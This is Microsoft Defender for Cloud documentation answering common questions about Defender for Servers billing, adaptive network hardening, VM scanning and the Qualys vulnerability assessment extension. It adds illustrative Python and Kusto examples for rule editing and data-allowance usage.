[Screenshot: Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage Adaptive Network Hardening recommendations for the VM PrefServer (Recommended rules: 45, Total alerts: 2). The Rules tab lists System Generated rules on ports 22 and 1128 (Allowed Source IP Ranges None, TCP), MicrosoftDefenderforCloud-ANCRule_3389_TCP_Inbound_ALLOW_1551874842891 on port 3389 (167.220.196.245, TCP) and Allow_DC_Manager on port 5506 (180.212.35.10/30, TCP/UDP); a row menu is open showing the Delete option.]


Next steps

- View common questions about adaptive network hardening


Common questions about Defender for Servers


FAQ 


Get answers to common questions about Microsoft Defender for Servers. 


Can I enable Defender for Servers on a subset of machines in a subscription?

No. When you enable Microsoft Defender for Servers on an Azure subscription or on a
connected AWS account or GCP project, all connected machines are protected by
Defender for Servers. Servers that don't have the Log Analytics agent or Azure Monitor
agent installed are also protected.


Can I get a discount if I already have a Microsoft Defender for Endpoint license?

If you already have a license for Microsoft Defender for Endpoint for Servers, you won't
have to pay for that part of your Microsoft Defender for Servers Plan 1 or 2 license.

To request your discount, contact the Defender for Cloud support team through the
Azure portal by creating a new support request in the help and support center.


1. Sign in to the Azure portal.

2. Select Support and Troubleshooting.

3. Select Help + support.

4. Select Create a support request.

5. Enter the following information:


[Screenshot: Home > Help + support > New support request, step 1 (Problem description), filled in as follows. Summary: "Requesting for Defender for servers P2 discount based on MDE for servers"; Issue type: Technical; Subscription: <Your subscription>; Service: My services; Service type: Microsoft Defender for Cloud; Problem type: Pricing, Billing and Usage; Problem subtype: Discount request for MDE integration; then the Next button.]


6. Select Next. 
7. Select Next. 


8. In the Additional details tab, enter your Customer Org name, Tenant ID, the 
number of Microsoft Defender for Endpoint for Servers licenses that were 
purchased, the expiration date of the Microsoft Defender for Endpoint for Servers 
licenses that were purchased, and all other required fields. 


9. Select Next. 


10. Select Create. 


Note

The discount becomes effective starting on the approval date. The discount isn't
retroactive.


What servers do I pay for in a subscription?

When you enable Defender for Servers on a subscription, you're charged for all
machines based on their power states.


Azure VMs:

| State        | Details                                                                                                                         | Billing    |
|--------------|---------------------------------------------------------------------------------------------------------------------------------|------------|
| Starting     | VM starting up.                                                                                                                 | Not billed |
| Running      | Normal working state.                                                                                                           | Billed     |
| Stopping     | Transitional. Moves to Stopped state when finished.                                                                             | Billed     |
| Stopped      | VM shut down from within guest OS or by using PowerOff APIs. Hardware is still allocated, and the machine remains on the host.  | Billed     |
| Deallocating | Transitional. Moves to Deallocated state when finished.                                                                         | Not billed |
| Deallocated  | VM stopped and removed from the host.                                                                                           | Not billed |

Azure Arc machines:

| State                | Details                                                      | Billing    |
|----------------------|--------------------------------------------------------------|------------|
| Connecting           | Servers connected, but heartbeat not yet received.           | Not billed |
| Connected            | Receiving regular heartbeat from Connected Machine agent.    | Billed     |
| Offline/Disconnected | No heartbeat received in 15-30 minutes.                      | Not billed |
| Expired              | If disconnected for 45 days, status might change to Expired. | Not billed |


Do I need to enable Defender for Servers on the subscription and on the
workspace?

Defender for Servers Plan 1 doesn't depend on Log Analytics. When you enable
Defender for Servers Plan 2 at the subscription level, Defender for Cloud automatically
enables the plan on your default Log Analytics workspaces. If you use a custom
workspace, make sure you enable the plan on the workspace. Here's more information:

- If you turn on Defender for Servers for a subscription and for a connected custom
workspace, you aren't charged for both. The system identifies unique VMs.
- If you enable Defender for Servers on cross-subscription workspaces:
  - For the Log Analytics agent, connected machines from all subscriptions are
billed, including subscriptions that don't have the Defender for Servers plan
enabled.
  - For the Azure Monitor agent, billing and feature coverage for Defender for
Servers depend only on the plan being enabled in the subscription.


What happens if I enabled the Defender for Servers plan at the workspace level
only (not at subscription)?

You can enable Microsoft Defender for Servers at the Log Analytics workspace level, but
only servers reporting to that workspace will be protected and billed, and those servers
won't receive some benefits, such as Microsoft Defender for Endpoint, vulnerability
assessment, and just-in-time VM access.


Is the 500 MB of free data ingestion 
allowance applied per workspace or per 
machine? 


When you have Defender for Servers Plan 2 enabled, you get 500 MB of free data 
ingestion per day. The allowance is specifically for the security data types that are 
directly collected by Defender for Cloud. 


This allowance is a daily rate that's averaged across all nodes. Your total daily free limit is 
equal to [number of machines] x 500 MB. You aren't charged extra if the total doesn't 
exceed your total daily free limit, even if some machines send 100 MB and others send 
800 MB. 


What data types are included in the 
daily allowance? 


Defender for Cloud billing is closely tied to the billing for Log Analytics. Microsoft 
Defender for Servers provides an allocation of 500 MB per node per day for machines 
against the following subset of security data types: 


- SecurityAlert
- SecurityBaseline
- SecurityBaselineSummary
- SecurityDetection
- SecurityEvent
- WindowsFirewall
- SysmonEvent
- ProtectionStatus
- Update and UpdateSummary when the Update Management solution isn't running
in the workspace or solution targeting is enabled.


If the workspace is in the legacy per-node pricing tier, the Defender for Cloud and Log 
Analytics allocations are combined and applied jointly to all billable ingested data. 


Am I charged for machines that don't have Log Analytics installed?

Yes. You're charged for all machines that are protected by Defender for Servers in Azure
subscriptions, connected AWS accounts, or connected GCP projects. The term machines
includes Azure virtual machines, instances of Azure Virtual Machine Scale Sets, and
Azure Arc-enabled servers. Machines that don't have Log Analytics installed are covered
by protections that don't depend on the Log Analytics agent.

If an agent reports to multiple workspaces, am I charged twice?

If a machine reports to multiple workspaces and all of them have Defender for Servers
enabled, the machine is billed for each attached workspace.


What's this "MDE.Windows" / "MDE.Linux" extension running on my machine?

In the past, Microsoft Defender for Endpoint was provisioned by the Log Analytics
agent. When we expanded support to include Windows Server 2019 and Linux, we also
added an extension to perform the automatic onboarding.

Defender for Cloud automatically deploys the extension to machines running:

- Windows Server 2019 and Windows Server 2022
- Windows Server 2012 R2 and 2016 if MDE Unified Solution integration is enabled
- Windows 10 on Azure Virtual Desktop
- Other versions of Windows Server if Defender for Cloud doesn't recognize the OS
version (for example, when a custom VM image is used). In this case, Microsoft
Defender for Endpoint is still provisioned by the Log Analytics agent.
- Linux

Important

If you delete the MDE.Windows/MDE.Linux extension, it won't remove Microsoft
Defender for Endpoint. To offboard the machine, see Offboard Windows servers.


I enabled the solution but the MDE.Windows/MDE.Linux extension isn't showing
on my machine

If you enabled the integration, but still don't see the extension running on your
machines:

1. Wait at least 12 hours to be sure there's an issue to investigate.

2. If after 12 hours you still don't see the extension running on your machines, check
that you've met the Prerequisites for the integration.

3. Ensure you've enabled the Microsoft Defender for Servers plan for the
subscriptions related to the machines you're investigating.

4. If you've moved your Azure subscription between Azure tenants, some manual
preparatory steps are required before Defender for Cloud deploys Defender for
Endpoint. For full details, contact Microsoft support.


What are the licensing requirements for Microsoft Defender for Endpoint?

Licenses for Defender for Endpoint for servers are included with Microsoft Defender for
Servers.


Do I need to buy a separate anti-malware solution to protect my machines?

No. With Defender for Endpoint integration in Defender for Servers, you'll also get
malware protection on your machines.

- On Windows Server 2012 R2 with Defender for Endpoint unified solution
integration enabled, Defender for Servers deploys Microsoft Defender Antivirus in
active mode.

- On newer Windows Server operating systems, Microsoft Defender Antivirus is part
of the operating system and will be enabled in active mode.

- On Linux, Defender for Servers deploys Defender for Endpoint including the
anti-malware component, and sets the component in passive mode.


If I already have a license for Microsoft Defender for Endpoint, can I get a
discount for Microsoft Defender for Servers?

If you already have a license for Microsoft Defender for Endpoint for Servers, you won't
pay for that part of your Microsoft Defender for Servers Plan 2 license. Learn more about
the Microsoft 365 license.

To request your discount, contact Defender for Cloud's support team. You need to
provide the relevant workspace ID, region, and number of Microsoft Defender for
Endpoint for servers licenses applied for machines in the given workspace.

The discount is effective starting from the approval date, and won't take place
retroactively.


How do I switch from a third-party EDR tool?

Full instructions for switching from a non-Microsoft endpoint solution are available in
the Microsoft Defender for Endpoint documentation: Migration overview.


Which Microsoft Defender for Endpoint plan is supported in Defender for
Servers?

Defender for Servers Plan 1 and Plan 2 provide the capabilities of Microsoft Defender
for Endpoint Plan 2.


Are there any options to enforce the 
application controls? 


No enforcement options are currently available. Adaptive application controls are 
intended to provide security alerts if any application runs other than the ones you've 
defined as safe. They have a range of benefits (What are the benefits of adaptive 
application controls?) and are customizable as shown on this page. 


Why do I see a Qualys app in my recommended applications?

Microsoft Defender for Servers includes vulnerability scanning for your machines. You
don't need a Qualys license or even a Qualys account - everything's handled seamlessly
inside Defender for Cloud. For details of this scanner and instructions for how to deploy
it, see Defender for Cloud's integrated Qualys vulnerability assessment solution.

To ensure no alerts are generated when Defender for Cloud deploys the scanner, the
adaptive application controls recommended allowlist includes the scanner for all
machines.


Why aren't all of my resources shown, 
such as subscriptions, machines, storage 
accounts in my asset inventory? 


The inventory view lists your Defender for Cloud connected resources from a Cloud 
Security Posture Management (CSPM) perspective. The filters show only the resources 
with active recommendations. 


For example, if you have access to eight subscriptions but only seven currently have
recommendations, filtering by Resource type = Subscriptions shows only the seven
subscriptions with active recommendations:


[Screenshot: the Inventory page filtered to Resource types == subscription (7), showing Total Resources 7 and seven subscription rows (Contoso Hotels Tenant, Contoso Infra1, Contoso Dev_EUS, Contoso Dev_India, Contoso Infra3, Contoso Infra2) with their Monitoring agent, Defender for Cloud and Recommendations columns.]


Why do some of my resources show blank values in the Defender for Cloud or
monitoring agent columns?

Not all Defender for Cloud monitored resources require agents. For example, Defender
for Cloud doesn't require agents to monitor Azure Storage accounts or PaaS resources,
such as disks, Logic Apps, Data Lake Analysis, and Event Hubs.

When pricing or agent monitoring isn't relevant for a resource, nothing is shown in
those columns of inventory.


[Screenshot: Microsoft Defender for Cloud | Inventory, showing 8 subscriptions. Virtual machine rows show Installed or Not installed in the Monitoring agent column and On in the Defender for Cloud column, while App Services, Storage accounts, Event Hubs Namespaces and Disks rows show blank values in those columns.]


Which ports are supported by adaptive 
network hardening? 


Adaptive network hardening recommendations are only supported on the following 
specific ports (for both UDP and TCP): 


13, 17, 19, 22, 23, 53, 69, 81, 111, 119, 123, 135, 137, 138, 139, 161, 162, 389, 445, 512, 
514, 593, 636, 873, 1433, 1434, 1900, 2049, 2301, 2323, 2381, 3268, 3306, 3389, 4333, 
5353, 5432, 5555, 5800, 5900, 5900, 5985, 5986, 6379, 6379, 7000, 7001, 7199, 8081, 
8089, 8545, 9042, 9160, 9300, 11211, 16379, 26379, 27017, 37215 


Are there any prerequisites or VM 
extensions required for adaptive 
network hardening? 


Adaptive network hardening is an agentless feature of Microsoft Defender for Cloud - 
nothing needs to be installed on your machines to benefit from this network hardening 
tool. 


When should I use a "Deny all traffic" rule?

A Deny all traffic rule is recommended when, as a result of running the algorithm,
Defender for Cloud doesn't identify traffic that should be allowed, based on the existing
NSG configuration. Therefore, the recommended rule is to deny all traffic to the
specified port. The name of this type of rule is displayed as "System Generated". After
enforcing this rule, its actual name in the NSG will be a string composed of the protocol,
traffic direction, "DENY", and a random number.
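The rule-editing guidelines from the Modify, Add and Delete sections (only allow rules can be modified or added in the portal, a Deny all traffic rule can only be deleted, and nothing reaches the NSG until Enforce) together with the two FAQ entries on supported ports and deny-all rules can be modelled in a few lines. The Python below is an added example, not Microsoft's code or the portal's implementation. The allow-rule name follows the one sample visible on this page; the separator used in the deny-rule name, the `*` source given to a deny-all rule, and treating the supported-port list as a reported sanity check rather than a hard block (the page's own screenshot shows a user-added rule on port 5506) are assumptions.

```python
"""Model of the adaptive network hardening rule-editing rules described on this page.

Added example, not Microsoft code. ALLOW names follow the one sample visible above; the
DENY name separator, the '*' source for a deny-all rule and the supported-port sanity
check are assumptions.
"""
from dataclasses import dataclass, replace
from typing import Dict, List

# Ports on which adaptive network hardening recommendations are supported (FAQ list).
SUPPORTED_PORTS = frozenset({
    13, 17, 19, 22, 23, 53, 69, 81, 111, 119, 123, 135, 137, 138, 139, 161, 162, 389, 445,
    512, 514, 593, 636, 873, 1433, 1434, 1900, 2049, 2301, 2323, 2381, 3268, 3306, 3389,
    4333, 5353, 5432, 5555, 5800, 5900, 5985, 5986, 6379, 7000, 7001, 7199, 8081, 8089,
    8545, 9042, 9160, 9300, 11211, 16379, 26379, 27017, 37215,
})


@dataclass(frozen=True)
class Rule:
    """One row of the Rules tab."""
    name: str
    port: int
    protocol: str            # "TCP", "UDP" or "TCP/UDP"
    sources: tuple = ()      # Allowed Source IP Ranges; empty is shown as 'None' in the portal
    direction: str = "Inbound"

    @property
    def action(self) -> str:
        # Portal tip: 'None' in Allowed Source IP Ranges means the rule is a deny rule.
        return "DENY" if not self.sources else "ALLOW"


class RuleEditError(ValueError):
    """An edit that the 'Modify a rule' / 'Add a new rule' guidelines do not permit."""


class HardeningSession:
    """Rule list of one 'Manage Adaptive Network Hardening recommendations' page.

    modify/add/delete only change this list; the NSG is untouched until enforce().
    """

    def __init__(self, recommended: List[Rule]):
        self.rules: Dict[str, Rule] = {r.name: r for r in recommended}

    def unsupported(self) -> List[str]:
        """Names of rules on ports outside the supported list (assumed check, not a block)."""
        return [r.name for r in self.rules.values() if r.port not in SUPPORTED_PORTS]

    def modify(self, name: str, **changes) -> Rule:
        rule = self.rules[name]
        if rule.action == "DENY":
            raise RuleEditError("a 'Deny all traffic' rule cannot be modified; delete it or edit the NSG")
        if "sources" in changes and not changes["sources"]:
            raise RuleEditError("an allow rule cannot be changed into a deny rule")
        self.rules[name] = replace(rule, **changes)   # saved, but not yet enforced
        return self.rules[name]

    def add(self, rule: Rule) -> None:
        if rule.action == "DENY":
            raise RuleEditError("only allow rules can be added here; deny rules go on the NSG")
        self.rules[rule.name] = rule                  # listed, but not yet enforced

    def delete(self, name: str) -> None:
        # Any listed rule, including a deny-all rule, can be dropped for this session.
        del self.rules[name]

    def enforce(self, names: List[str], stamp: int) -> List[dict]:
        """Return the NSG security rules that Enforce would add for the selected rows."""
        nsg_rules = []
        for name in names:
            r = self.rules[name]
            if r.action == "ALLOW":
                nsg_name = (f"MicrosoftDefenderforCloud-ANCRule_{r.port}_{r.protocol}"
                            f"_{r.direction}_ALLOW_{stamp}")
            else:
                # Page: protocol, direction, "DENY" and a random number (separator assumed).
                nsg_name = f"{r.protocol}_{r.direction}_DENY_{stamp}"
            nsg_rules.append({"name": nsg_name, "access": r.action, "port": r.port,
                              "protocol": r.protocol,
                              "sources": list(r.sources) or ["*"]})   # deny-all: any source
        return nsg_rules


if __name__ == "__main__":
    session = HardeningSession([
        Rule("System Generated", 22, "TCP"),
        Rule("MicrosoftDefenderforCloud-ANCRule_3389_TCP_Inbound_ALLOW_1551874842891",
             3389, "TCP", ("167.220.196.245",)),
    ])
    session.add(Rule("Allow_DC_Manager", 5506, "TCP/UDP", ("180.212.35.10/30",)))
    print("outside supported ports:", session.unsupported())
    for nsg_rule in session.enforce(list(session.rules), stamp=1551874842891):
        print(nsg_rule)
```

The point worth keeping from the model is the two-phase behaviour: every edit is local to the session until Enforce, and the only way to narrow traffic is to delete a recommended allow rule or to tighten its source ranges, never to turn it into a deny rule from this page.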


How do | deploy the prerequisites for 
the security configuration 
recommendations? 


To deploy the Guest Configuration extension with its prerequisites: 


- For selected machines, follow the security recommendation Guest Configuration
extension should be installed on your machines from the Implement security
best practices security control.

- At scale, assign the policy initiative Deploy prerequisites to enable Guest
Configuration policies on virtual machines.


Why is a machine shown as not 
applicable? 


The list of resources in the Not applicable tab includes a Reason column. Some of the 
common reasons include: 


| Reason | Details |
|--------|---------|
| No scan data available on the machine | There aren't any compliance results for this machine in Azure Resource Graph. All compliance results are written to Azure Resource Graph by the Guest Configuration extension. You can check the data in Azure Resource Graph using the sample queries in Azure Policy Guest Configuration - sample ARG queries. |
| Guest Configuration extension isn't installed on the machine | The machine is missing the Guest Configuration extension, which is a prerequisite for assessing the compliance with the Azure security baseline. |
| System managed identity isn't configured on the machine | A system-assigned, managed identity must be deployed on the machine. |
| The recommendation is disabled in policy | The policy definition that assesses the OS baseline is disabled on the scope that includes the relevant machine. |


If I enable Defender for Cloud's Servers plan on the subscription level, do I need
to enable it on the workspace level?

When you enable the Servers plan on the subscription level, Defender for Cloud enables
the Servers plan on your default workspaces automatically. Connect to the default
workspace by selecting the Connect Azure VMs to the default workspace(s) created by
Defender for Cloud option and selecting Apply.


[Screenshot: Home > Microsoft Defender for Cloud > Settings | Auto provisioning, with the Extension deployment configuration pane open for "Log Analytics agent for Azure VMs". The pane notes that if a VM already has either SCOM or OMS agent installed locally, the Log Analytics agent extension will still be installed and connected to the configured workspace, and that any other solutions enabled on the selected workspace will be applied to connected Azure VMs (for paid solutions this could result in additional charges). Under Workspace configuration, "Connect Azure VMs to the default workspace(s) created by Defender for Cloud" is selected (the alternative is "Connect Azure VMs to a different workspace"), followed by "Store additional raw data - Windows security events" and the Apply and Cancel buttons.]


However, if you're using a custom workspace in place of the default workspace, you
need to enable the Servers plan on all of your custom workspaces that don't have it
enabled.

If you're using a custom workspace and enable the plan on the subscription level only,
the Microsoft Defender for servers should be enabled on workspaces recommendation
appears on the Recommendations page. This recommendation gives you the option to
enable the servers plan on the workspace level with the Fix button. You're charged for all
VMs in the subscription even if the Servers plan isn't enabled for the workspace. The
VMs won't benefit from features that depend on the Log Analytics workspace, such as
Microsoft Defender for Endpoint, VA solution (MDVM/Qualys), and Just-in-Time VM
access.

Enabling the Servers plan on both the subscription and its connected workspaces won't
incur a double charge. The system will identify each unique VM.

If you enable the Servers plan on cross-subscription workspaces, connected VMs from
all subscriptions will be billed, including subscriptions that don't have the Servers plan
enabled.


Will I be charged for machines without the Log Analytics agent installed?

Yes. When you enable Microsoft Defender for Servers on an Azure subscription or a
connected AWS account, you'll be charged for all machines that are connected to your
Azure subscription or AWS account. The term machines includes Azure virtual machines,
Azure Virtual Machine Scale Sets instances, and Azure Arc-enabled servers. Machines
that don't have Log Analytics installed are covered by protections that don't depend on
the Log Analytics agent.


If a Log Analytics agent reports to multiple workspaces, will I be charged twice?

If a machine reports to multiple workspaces, and all of them have Defender for Servers
enabled, the machine will be billed for each attached workspace.


If a Log Analytics agent reports to multiple workspaces, is the 500-MB free
data ingestion available on all of them?

Yes. If you configure your Log Analytics agent to send data to two or more different Log
Analytics workspaces (multi-homing), you'll get 500-MB free data ingestion for each
workspace. It's calculated per node, per reported workspace, per day, and available for
every workspace that has a 'Security' or 'AntiMalware' solution installed. You'll be
charged for any data ingested over the 500-MB limit.


Is the 500-MB free data ingestion 
calculated for an entire workspace or 
strictly per machine? 


You receive a daily allowance of 500 MB of free data ingestion for each virtual machine 
(VM) connected to the workspace. This allocation specifically applies to the security data 
types collected directly by Defender for Cloud. 


The data allowance is a daily rate calculated across all connected machines. Your total 
daily free limit is equal to the [number of machines] x 500 MB. So even if on a given 
day some machines send 100 MB and others send 800 MB, if the total data from all 
machines doesn't exceed your daily free limit, you won't be charged extra. 


What data types are included in the 
500-MB data daily allowance? 


Defender for Cloud's billing is closely tied to the billing for Log Analytics. Microsoft 
Defender for Servers provides a 500 MB/node/day allocation for machines against the 
following subset of security data types: 


- SecurityAlert
- SecurityBaseline
- SecurityBaselineSummary
- SecurityDetection
- SecurityEvent
- WindowsFirewall
- SysmonEvent
- ProtectionStatus
- Update and UpdateSummary when the Update Management solution isn't running
in the workspace or solution targeting is enabled.

If the workspace is in the legacy Per Node pricing tier, the Defender for Cloud and Log
Analytics allocations are combined and applied jointly to all billable ingested data. To
learn more on how Microsoft Sentinel customers can benefit, please see the Microsoft
Sentinel Pricing page.
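The allowance answers above, and the earlier "Is the 500 MB of free data ingestion allowance applied per workspace or per machine?" entry, describe the same three rules: the allowance is pooled across the machines reporting to a workspace (total free limit = [number of machines] x 500 MB), it applies only to the listed security data types, and a multi-homed agent earns it again in each workspace. The Python below is an added example that works those rules through on constructed data; it is not Microsoft's billing code. The rows are constructed to resemble Log Analytics Usage records, Update/UpdateSummary are handled according to the caveat in the list, and charging every non-covered data type in full at normal Log Analytics rates is a simplification of the page's text.

```python
"""Worked example of the 500 MB/node/day Defender for Servers data allowance.

Added example, not Microsoft billing code. Rows are constructed to resemble Log Analytics
Usage records; non-covered data types are simply charged in full, a simplification.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, List

ALLOWANCE_MB_PER_NODE = 500

# Security data types the allowance always applies to (the FAQ list, minus the conditional pair).
ALWAYS_COVERED: FrozenSet[str] = frozenset({
    "SecurityAlert", "SecurityBaseline", "SecurityBaselineSummary", "SecurityDetection",
    "SecurityEvent", "WindowsFirewall", "SysmonEvent", "ProtectionStatus",
})


def covered_types(update_management_running: bool = False,
                  solution_targeting: bool = False) -> FrozenSet[str]:
    """Update/UpdateSummary count only when Update Management isn't running in the
    workspace or solution targeting is enabled (the FAQ's caveat)."""
    if not update_management_running or solution_targeting:
        return ALWAYS_COVERED | {"Update", "UpdateSummary"}
    return ALWAYS_COVERED


@dataclass(frozen=True)
class UsageRow:
    workspace: str
    computer: str
    data_type: str
    mb: float


def daily_billable_mb(rows: Iterable[UsageRow], **workspace_flags) -> Dict[str, dict]:
    """Per workspace: pooled allowance = nodes x 500 MB, overage on covered types,
    plus all non-covered data. A multi-homed node gets the allowance in each workspace."""
    covered = covered_types(**workspace_flags)
    by_ws: Dict[str, List[UsageRow]] = defaultdict(list)
    for row in rows:
        by_ws[row.workspace].append(row)
    report = {}
    for ws, ws_rows in by_ws.items():
        nodes = {r.computer for r in ws_rows}
        covered_mb = sum(r.mb for r in ws_rows if r.data_type in covered)
        other_mb = sum(r.mb for r in ws_rows if r.data_type not in covered)
        free_mb = len(nodes) * ALLOWANCE_MB_PER_NODE
        overage = max(0, covered_mb - free_mb)          # pooled, not per machine
        report[ws] = {"nodes": len(nodes), "free_mb": free_mb, "covered_mb": covered_mb,
                      "covered_overage_mb": overage, "other_mb": other_mb,
                      "billable_mb": overage + other_mb}
    return report


# Constructed sample: one day of ingestion. vm-web-02 is multi-homed to both workspaces.
SAMPLE_ROWS = [
    UsageRow("ws-prod", "vm-web-01", "SecurityEvent", 100),
    UsageRow("ws-prod", "vm-web-02", "SecurityEvent", 800),     # over 500 alone; pooled it fits
    UsageRow("ws-prod", "vm-web-01", "Perf", 50),               # not a covered type
    UsageRow("ws-sentinel", "vm-web-02", "SecurityEvent", 600), # only node there: 500 MB free
]

if __name__ == "__main__":
    for ws, summary in daily_billable_mb(SAMPLE_ROWS).items():
        print(ws, summary)
```

On the sample, ws-prod has two nodes (1000 MB pooled), so the 100 MB + 800 MB of SecurityEvent is inside the allowance and only the 50 MB of Perf is billable; ws-sentinel sees vm-web-02 alone, so its 600 MB is 100 MB over that workspace's own 500 MB allowance.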


How can I monitor my daily usage?

You can view your data usage in two different ways: in the Azure portal, or by running a
script.

To view your usage in the Azure portal:

1. Sign in to the Azure portal.

2. Navigate to Log Analytics workspaces.

3. Select your workspace.

4. Select Usage and estimated costs.


[Screenshot: the "Usage and estimated costs" page of a Log Analytics workspace. It lists the pricing tiers (Pay-as-you-go per GB, marked as the current tier; 100 GB/day Commitment Tier with a 15% discount; 200 GB/day Commitment Tier with a 20% discount), an Estimated costs table with the items Log data ingestion, Defender allowance and Data retention (beyond 31 days) showing price, monthly usage over the last 31 days and estimated monthly cost, and usage charts for billable data ingestion per solution (last 31 days) and data ingested per solution (last 90 days). The page notes: "These estimated costs do not include Microsoft Defender costs. The Microsoft Defender 500 MB/node/day data allowance is factored into the estimate of Log Analytics billing."]


You can also view estimated costs under a different pricing tier by expanding that 
pricing tier's entry. 


[Screenshot: the same Usage and estimated costs page with a pricing tier expanded, 
showing its Price, Monthly usage (last 31 days) and Estimated monthly cost columns, and 
the Defender allowance row.] 


To view your usage by running a query: 

1. Sign in to the Azure portal. 
2. Navigate to Log Analytics workspaces > Logs. 
3. Select your time range. Learn about time ranges. 
4. Copy and paste the following query into the Type your query here section. 

Kusto 

    // Billable ingestion for the data types covered by the Defender for Servers 
    // allocation. Usage.Quantity is reported in MB, so dividing by 1024 gives GB. 
    Usage 
    | where IsBillable == true 
    | where DataType in ('SecurityAlert', 'SecurityBaseline', 'SecurityBaselineSummary', 
        'SecurityDetection', 'SecurityEvent', 'WindowsFirewall', 'MaliciousIPCommunication', 
        'SysmonEvent', 'ProtectionStatus', 'Update', 'UpdateSummary') 
    | project TimeGenerated, DataType, Solution, Quantity, QuantityUnit 
    // Unit after the division is GB; don't carry QuantityUnit (MBytes) into the result. 
    | summarize DataConsumedGB = sum(Quantity) / 1024 by DataType 
    | sort by DataConsumedGB desc 

Compare the daily total of these rows against 500 MB multiplied by the number of 
machines covered by Defender for Servers on the workspace; only the excess is billable. 


5. Select Run. 

To learn more, see Analyze usage in Log Analytics workspace. 

Based on your usage, you won't be billed until you've used your daily allowance. If 
you're receiving a bill, it's only for the data used after the 500-MB limit is reached, or for 
other services that don't fall under the coverage of Defender for Cloud. 


How can I manage my costs? 


You may want to manage your costs and limit the amount of data collected for a 
solution by limiting it to a particular set of agents. Use solution targeting to apply a 
scope to the solution and target a subset of computers in the workspace. If you're using 
solution targeting, Defender for Cloud lists the workspace as not having a solution. 


Important 

Solution targeting has been deprecated because the Log Analytics agent is being 
replaced with the Azure Monitor agent and solutions in Azure Monitor are being 
replaced with insights. You can continue to use solution targeting if you already 
have it configured, but it isn't available in new regions. The feature won't be 
supported after August 31, 2024. Regions that support solution targeting until the 
deprecation date are: 

Region code   Region name 
CCAN          canadacentral 
CHN           switzerlandnorth 
CID           centralindia 
CQ            brazilsouth 
CUS           centralus 
DEWC          germanywestcentral 
DXB           UAENorth 
EA            eastasia 
EAU           australiaeast 
EJP           japaneast 
EUS           eastus 
EUS2          eastus2 
NCUS          northcentralus 
NEU           NorthEurope 
NOE           norwayeast 
PAR           FranceCentral 
SCUS          southcentralus 
SE            KoreaCentral 
SEA           southeastasia 
SEAU          australiasoutheast 
SUK           uksouth 
WCUS          westcentralus 
WEU           westeurope 
WUS           westus 
WUS2          westus2 

Air-gapped clouds   Region code   Region name 
UsNat               EXE           usnateast 
UsNat               EXW           usnatwest 
UsGov               FF            usgovvirginia 
China               MC            ChinaEast2 
UsGov               PHX           usgovarizona 
UsSec               RXE           usseceast 
UsSec               RXW           ussecwest 

Next steps 

Plan your Defender for Servers deployment 


Common questions about virtual machines 

FAQ 

What types of virtual machines are supported? 

Monitoring and recommendations are available for virtual machines (VMs) created using 
both the classic and Resource Manager deployment models. 

See Supported platforms in Microsoft Defender for Cloud for a list of supported 
platforms. 


Why doesn't Microsoft Defender for Cloud recognize the antimalware solution running on my Azure VM? 

Microsoft Defender for Cloud only has visibility into antimalware installed through Azure 
extensions. As a result, Defender for Cloud is not able to detect antimalware that was 
pre-installed on an image you provided, or antimalware that you installed on your virtual 
machines using your own processes (such as configuration management systems). 


Why do I get the message "Missing Scan Data" for my VM? 


This message appears when there is no scan data for a VM. It can take some time (less 
than an hour) for scan data to populate after Data Collection is enabled in Microsoft 
Defender for Cloud. After the initial population of scan data, you may receive this 
message because there is no scan data at all or there is no recent scan data. Scans do 
not populate for a VM in a stopped state. This message could also appear if scan data 
has not populated recently (in accordance with the retention policy for the Windows 
agent, which has a default value of 30 days). 


How often does Defender for Cloud scan for operating system vulnerabilities, system updates, and endpoint protection issues? 

Below are the latency times for Defender for Cloud scans of vulnerabilities, updates, and 
issues: 

• Operating system security configurations: data is updated within 48 hours 
• System updates: data is updated within 24 hours 
• Endpoint Protection issues: data is updated within 8 hours 

Defender for Cloud typically scans for new data every hour, and refreshes the 
recommendations accordingly. 

Defender for Cloud uses monitoring components to collect and store data. To learn 
more, see the documentation on monitoring components. 


Why do I get the message "VM Agent is Missing"? 

The VM Agent must be installed on VMs to enable Data Collection. The VM Agent is 
installed by default for VMs that are deployed from the Azure Marketplace. For 
information on how to install the VM Agent on other VMs, see the blog post VM Agent 
and Extensions. 


How are VM snapshots secured? 

Agentless scanning protects disk snapshots according to Microsoft's highest security 
standards. To ensure VM snapshots are private and secure during the analysis process, 
some of the measures taken are: 

• Data is encrypted at rest and in transit. 
• Snapshots are immediately deleted when the analysis process is complete. 
• Snapshots remain within their original AWS or Azure region. EC2 snapshots aren't 
  copied to Azure. 
• Isolation of environments per customer account/subscription. 
• Only metadata containing scan results is sent outside the isolated scanning 
  environment. 
• All operations are audited. 


Common questions about vulnerability assessment 


FAQ 


Are there any additional charges for the Qualys license? 


No. The built-in scanner is free to all Microsoft Defender for Servers users. The 
recommendation deploys the scanner with its licensing and configuration information. 
No additional licenses are required. 


What prerequisites and permissions are required to install the Qualys extension? 

You'll need write permissions for any machine on which you want to deploy the 
extension. 

The Microsoft Defender for Cloud vulnerability assessment extension (powered by 
Qualys), like other extensions, runs on top of the Azure Virtual Machine agent. So it runs 
as Local Host on Windows, and Root on Linux. 

During setup, Defender for Cloud checks to ensure that the machine can communicate 
over HTTPS (default port 443) with the following two Qualys data centers: 

• https://qagpublic.qg3.apps.qualys.com - Qualys' US data center 
• https://qagpublic.qg2.apps.qualys.eu - Qualys' European data center 

The extension doesn't currently accept any proxy configuration details. However, you 
can configure the Qualys agent's proxy settings locally in the virtual machine. Follow 
the guidance in the Qualys documentation: 

• Windows proxy configuration 
• Linux proxy configuration 


Can I remove the Defender for Cloud Qualys extension? 

If you want to remove the extension from a machine, you can do it manually or with any 
of your programmatic tools. You'll need the following details: 

• On Linux, the extension is called LinuxAgent.AzureSecurityCenter and the 
  publisher name is Qualys. 
• On Windows, the extension is called WindowsAgent.AzureSecurityCenter and the 
  publisher name is Qualys. 


How can I check that the Qualys extension is properly installed? 

You can use the curl command to check the connectivity to the relevant Qualys URL. A 
valid response would be: {"code":404,"message":"HTTP 404 Not Found"} 

In addition, make sure that the DNS resolution for these URLs is successful and that 
everything is valid with the certificate authority that is used. A 200 response carrying an 
HTML page instead of the JSON 404 usually means a proxy or captive portal answered 
rather than Qualys. 
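A scripted version of the checks described in this answer, added here as an example (it is not Microsoft's or Qualys's code). It resolves each Qualys host, opens an HTTPS connection with certificate validation left on, and accepts only the documented 404 JSON body. The two hostnames come from the answer above; the curl exit-code mapping, the function names and the optional `az vm extension show` state check are this example's own assumptions.

```shell
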